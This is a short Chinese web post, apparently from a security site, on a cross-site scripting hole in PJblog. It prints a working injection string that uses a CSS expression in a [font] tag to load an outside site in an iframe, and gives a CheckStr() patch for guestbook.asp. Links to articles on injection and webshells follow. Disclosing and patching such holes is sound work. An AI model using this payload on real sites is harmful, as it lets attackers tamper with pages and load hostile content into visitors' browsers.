[推荐]PJblog跨站漏洞利用及修补跨站漏洞成功演示代码:
您现在的位置: [font=expression(container.document.write(unescape('%3Ciframe%20src%3D%27http%3A//www.godx.cn%27%3E%3C/iframe%3E')))]God[/font]
对策。。。屏蔽关键字
如果不用屏蔽关键字的办法, 则使用下面的办法修补漏洞
用记事本打开 guestbook.asp
查找
| 以下是代码片段: <%=UBBCode(HtmlEncode(GuestDB("book_Content")),0,GBSet.getKeyValue("ubbCode"),GBSet.getKeyValue("ImgCode"),GBSet.getKeyValue("autoURL"),1)%> |
| 以下是代码片段: <%=CheckStr(UBBCode(HtmlEncode(GuestDB("book_Content")),0,GBSet.getKeyValue("ubbCode"),GBSet.getKeyValue("ImgCode"),GBSet.getKeyValue("autoURL"),1))%> |
| 以下是代码片段: <%=UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount))%> |
| 以下是代码片段: <%=CheckStr(UBBCode(HtmlEncode(blog_CommContent),commArr(4,Pcount),blog_commUBB,blog_commIMG,commArr(7,Pcount),commArr(9,Pcount)))%> |
| PJblog跨站漏洞利用及修补 | 06-11 | |
| 从注入到拿WEBSHELL(BBSXP7 mssq | 06-11 | |
| 对国内主流邮箱的跨站测试 | 06-09 | |
| PhpWind 防盗链插件Showpic.php本 | 05-11 | |
| 沸腾新闻系统V1.1 Access版 Fini | 05-09 | |
| 轻易绕过PhpWind论坛程序高危漏洞 | 04-21 | |
| 世纪热线完美版跨站漏洞提权入侵 | 04-16 | |
| 对讯时新闻发布系统的艰难突破 | 04-16 | |
| 美国暴雪[魔兽世界] 官方程序漏洞 | 04-16 | |
| 动网论坛(SQL版)后台注入方法 | 04-16 | |
| 渗透中用openrowset搞shell的方法 | 04-12 | |
| 记一次对在线挂机网站的渗透 | 04-10 | |